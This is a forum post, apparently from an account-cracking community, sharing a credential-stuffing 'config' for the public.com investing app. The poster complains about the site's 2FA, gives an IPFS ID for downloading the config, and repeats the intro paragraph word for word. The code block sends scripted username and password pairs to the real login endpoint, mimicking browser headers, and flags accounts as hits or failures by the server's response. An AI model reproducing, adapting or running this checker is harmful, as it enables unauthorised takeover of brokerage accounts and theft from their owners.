OP 22 May, 2022 - 05:17 PM
(This post was last modified: 22 May, 2022 - 06:04 PM by 333tinytmp. Edited 1 time in total.)
Here is an investing app config
this site is full of 2fa...
also hides their phone numbers
so fuck it :c
to download IPFS: QmehXQqGZnhPtV19VDZRyz5wGn8437DKHsXxGwxMTQG5t7
if you dont know how to download from the id just unlock the ID
IPFS is cool and, wont result in dead links in smaller files!@
Leechers who dont want to comment can use the lolicode
this site is full of 2fa...
also hides their phone numbers
so fuck it :c
to download IPFS: QmehXQqGZnhPtV19VDZRyz5wGn8437DKHsXxGwxMTQG5t7
if you dont know how to download from the id just unlock the ID
IPFS is cool and, wont result in dead links in smaller files!@
Leechers who dont want to comment can use the lolicode
Code:
BLOCK:HttpRequest
url = "https://public.com/userservice/public/web/login"
method = POST
httpLibrary = SystemNet
securityProtocol = TLS13
customHeaders = {("accept-encoding", "gzip, deflate, br"), ("accept-language", "en-US,en;q=0.9"), ("cache-control", "no-cache"), ("content-length", "80"), ("content-type", "application/json"), ("origin", "https://public.com"), ("pragma", "no-cache"), ("referer", "https://public.com/login"), ("sec-fetch-dest", "empty"), ("sec-fetch-mode", "cors"), ("sec-fetch-site", "same-origin"), ("sec-gpc", "1"), ("user-agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36"), ("x-app-version", "web-0.12.2")}
httpVersion = "2.0"
TYPE:STANDARD
$"{\"email\":\"<input.USER>\",\"password\":\"<input.PASS>\",\"stayLoggedIn\":true}"
"application/json"
ENDBLOCK
BLOCK:Keycheck
KEYCHAIN SUCCESS OR
STRINGKEY @data.SOURCE Contains "mixpanelUuid"
KEYCHAIN FAIL OR
STRINGKEY @data.SOURCE Contains "message\":\"Invalid credentials"
ENDBLOCK